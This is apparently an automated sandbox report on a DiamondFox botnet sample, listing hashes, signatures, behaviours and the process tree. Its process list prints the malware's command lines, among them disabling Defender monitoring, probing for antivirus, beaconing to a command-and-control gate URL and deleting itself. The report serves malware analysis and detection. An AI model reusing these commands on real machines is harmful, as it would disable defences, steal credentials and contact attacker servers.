Analysis
-
max time kernel
136s -
max time network
134s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
04-07-2021 12:03
Static task
static1
Behavioral task
behavioral1
Sample
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
Resource
win10v20210408
General
-
Target
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
-
Size
203KB
-
MD5
a1e165e1926c0c83123c89fce6b1af56
-
SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f
-
SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
-
SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 11 IoCs
Detects DiamondFox payload in file/memory.
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox -
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/1524-209-0x000000000044412E-mapping.dmp MailPassView behavioral2/memory/1524-211-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/2300-196-0x00000000004466F4-mapping.dmp WebBrowserPassView behavioral2/memory/2300-198-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 6 IoCs
Processes:
resource yara_rule behavioral2/memory/2300-196-0x00000000004466F4-mapping.dmp Nirsoft behavioral2/memory/2300-198-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral2/memory/2264-206-0x0000000000413E10-mapping.dmp Nirsoft behavioral2/memory/2264-208-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral2/memory/1524-209-0x000000000044412E-mapping.dmp Nirsoft behavioral2/memory/1524-211-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft -
Executes dropped EXE 10 IoCs
Processes:
MicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exepid process 4084 MicrosoftEdgeCPS.exe 2300 MicrosoftEdgeCPS.exe 592 MicrosoftEdgeCPS.exe 2264 MicrosoftEdgeCPS.exe 1524 MicrosoftEdgeCPS.exe 656 MicrosoftEdgeCPS.exe 2236 MicrosoftEdgeCPS.exe 196 MicrosoftEdgeCPS.exe 3584 MicrosoftEdgeCPS.exe 1280 MicrosoftEdgeCPS.exe -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 2852 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 9 IoCs
Processes:
MicrosoftEdgeCPS.exedescription pid process target process PID 4084 set thread context of 2300 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 set thread context of 592 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 set thread context of 2264 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 set thread context of 1524 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 set thread context of 656 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 set thread context of 2236 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 set thread context of 196 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 set thread context of 3584 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 set thread context of 1280 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3868 1280 WerFault.exe MicrosoftEdgeCPS.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 1632 notepad.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
powershell.exepowershell.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeWerFault.exepid process 2852 powershell.exe 2308 powershell.exe 2852 powershell.exe 2308 powershell.exe 2852 powershell.exe 2308 powershell.exe 4084 MicrosoftEdgeCPS.exe 4084 MicrosoftEdgeCPS.exe 2300 MicrosoftEdgeCPS.exe 2300 MicrosoftEdgeCPS.exe 2300 MicrosoftEdgeCPS.exe 2300 MicrosoftEdgeCPS.exe 2264 MicrosoftEdgeCPS.exe 2264 MicrosoftEdgeCPS.exe 1280 MicrosoftEdgeCPS.exe 1280 MicrosoftEdgeCPS.exe 4084 MicrosoftEdgeCPS.exe 4084 MicrosoftEdgeCPS.exe 3868 WerFault.exe 3868 WerFault.exe 3868 WerFault.exe 3868 WerFault.exe 3868 WerFault.exe 3868 WerFault.exe 3868 WerFault.exe 3868 WerFault.exe 3868 WerFault.exe 3868 WerFault.exe 3868 WerFault.exe 3868 WerFault.exe 3868 WerFault.exe 3868 WerFault.exe 4084 MicrosoftEdgeCPS.exe 4084 MicrosoftEdgeCPS.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wmic.exepowershell.exepowershell.exewmic.exedescription pid process Token: SeIncreaseQuotaPrivilege 2080 wmic.exe Token: SeSecurityPrivilege 2080 wmic.exe Token: SeTakeOwnershipPrivilege 2080 wmic.exe Token: SeLoadDriverPrivilege 2080 wmic.exe Token: SeSystemProfilePrivilege 2080 wmic.exe Token: SeSystemtimePrivilege 2080 wmic.exe Token: SeProfSingleProcessPrivilege 2080 wmic.exe Token: SeIncBasePriorityPrivilege 2080 wmic.exe Token: SeCreatePagefilePrivilege 2080 wmic.exe Token: SeBackupPrivilege 2080 wmic.exe Token: SeRestorePrivilege 2080 wmic.exe Token: SeShutdownPrivilege 2080 wmic.exe Token: SeDebugPrivilege 2080 wmic.exe Token: SeSystemEnvironmentPrivilege 2080 wmic.exe Token: SeRemoteShutdownPrivilege 2080 wmic.exe Token: SeUndockPrivilege 2080 wmic.exe Token: SeManageVolumePrivilege 2080 wmic.exe Token: 33 2080 wmic.exe Token: 34 2080 wmic.exe Token: 35 2080 wmic.exe Token: 36 2080 wmic.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeDebugPrivilege 2852 powershell.exe Token: SeIncreaseQuotaPrivilege 2080 wmic.exe Token: SeSecurityPrivilege 2080 wmic.exe Token: SeTakeOwnershipPrivilege 2080 wmic.exe Token: SeLoadDriverPrivilege 2080 wmic.exe Token: SeSystemProfilePrivilege 2080 wmic.exe Token: SeSystemtimePrivilege 2080 wmic.exe Token: SeProfSingleProcessPrivilege 2080 wmic.exe Token: SeIncBasePriorityPrivilege 2080 wmic.exe Token: SeCreatePagefilePrivilege 2080 wmic.exe Token: SeBackupPrivilege 2080 wmic.exe Token: SeRestorePrivilege 2080 wmic.exe Token: SeShutdownPrivilege 2080 wmic.exe Token: SeDebugPrivilege 2080 wmic.exe Token: SeSystemEnvironmentPrivilege 2080 wmic.exe Token: SeRemoteShutdownPrivilege 2080 wmic.exe Token: SeUndockPrivilege 2080 wmic.exe Token: SeManageVolumePrivilege 2080 wmic.exe Token: 33 2080 wmic.exe Token: 34 2080 wmic.exe Token: 35 2080 wmic.exe Token: 36 2080 wmic.exe Token: SeIncreaseQuotaPrivilege 3180 wmic.exe Token: SeSecurityPrivilege 3180 wmic.exe Token: SeTakeOwnershipPrivilege 3180 wmic.exe Token: SeLoadDriverPrivilege 3180 wmic.exe Token: SeSystemProfilePrivilege 3180 wmic.exe Token: SeSystemtimePrivilege 3180 wmic.exe Token: SeProfSingleProcessPrivilege 3180 wmic.exe Token: SeIncBasePriorityPrivilege 3180 wmic.exe Token: SeCreatePagefilePrivilege 3180 wmic.exe Token: SeBackupPrivilege 3180 wmic.exe Token: SeRestorePrivilege 3180 wmic.exe Token: SeShutdownPrivilege 3180 wmic.exe Token: SeDebugPrivilege 3180 wmic.exe Token: SeSystemEnvironmentPrivilege 3180 wmic.exe Token: SeRemoteShutdownPrivilege 3180 wmic.exe Token: SeUndockPrivilege 3180 wmic.exe Token: SeManageVolumePrivilege 3180 wmic.exe Token: 33 3180 wmic.exe Token: 34 3180 wmic.exe Token: 35 3180 wmic.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
MicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exepid process 592 MicrosoftEdgeCPS.exe 2236 MicrosoftEdgeCPS.exe 196 MicrosoftEdgeCPS.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exeMicrosoftEdgeCPS.exedescription pid process target process PID 776 wrote to memory of 4084 776 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe MicrosoftEdgeCPS.exe PID 776 wrote to memory of 4084 776 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe MicrosoftEdgeCPS.exe PID 776 wrote to memory of 4084 776 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe MicrosoftEdgeCPS.exe PID 776 wrote to memory of 2852 776 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe powershell.exe PID 776 wrote to memory of 2852 776 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe powershell.exe PID 776 wrote to memory of 2852 776 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe powershell.exe PID 4084 wrote to memory of 2308 4084 MicrosoftEdgeCPS.exe powershell.exe PID 4084 wrote to memory of 2308 4084 MicrosoftEdgeCPS.exe powershell.exe PID 4084 wrote to memory of 2308 4084 MicrosoftEdgeCPS.exe powershell.exe PID 4084 wrote to memory of 2080 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2080 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2080 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 3180 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 3180 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 3180 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2792 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2792 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2792 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 1076 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 1076 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 1076 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2272 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2272 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2272 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2140 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2140 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2140 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2944 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2944 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2944 4084 MicrosoftEdgeCPS.exe wmic.exe PID 4084 wrote to memory of 2300 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2300 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2300 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2300 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2300 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2300 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2300 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2300 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2300 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 592 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 592 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 592 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 592 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 592 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 592 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 592 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 592 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2264 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2264 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2264 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2264 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2264 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2264 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2264 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2264 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 2264 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 1524 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 1524 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 1524 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 1524 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 1524 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 1524 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 1524 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 4084 wrote to memory of 1524 4084 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe"C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
-
C:\Windows\notepad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\write.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 5884⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe' -Force -Recurse2⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
1c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
b2fa30cc11eddf10214bf9962e1eb6a8
SHA14224949a0aa0547630c33d933a4efc26fbd2ba0a
SHA2561ce826fcc07ce27822102163c3f2b8c6ce480b13ceab14bbd102b06bb3dd7004
SHA512603ad06f1c635a33384c2391cc80777c53a1c768ee7cc357ce5513b957c69082692d056d4be9dc9c5f64455d0818142063d82fc45ca7195a238e9c608a3ed4ee
-
C:\Users\Admin\AppData\Local\Temp\1.logMD5
4ab56e327e56a995c158a6116430835b
SHA1bf39dbae7798cc8bd7d7073998b09652412b111b
SHA256269c32926bf6faebe0581c23903f8dc8cef41ad46b333435d038b81d47f4785e
SHA51237704769bf293cd6a9c0ccbec359fbb7278f163911d3f2ae27f6c9c3dece55be70c2c5695be953def5984b7eda05953b19581df236c44d5d269cf258e49ab4af
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\heur.confMD5
8d420eababb7173b1abb86df8fcbd30c
SHA111b77c1218bf308d47bb4b89600d3f72af82d525
SHA2561ccfc7778c058e57f64c2e6b985a2c3ea606f0c34b06ac2f4cd2bcf9706d05ba
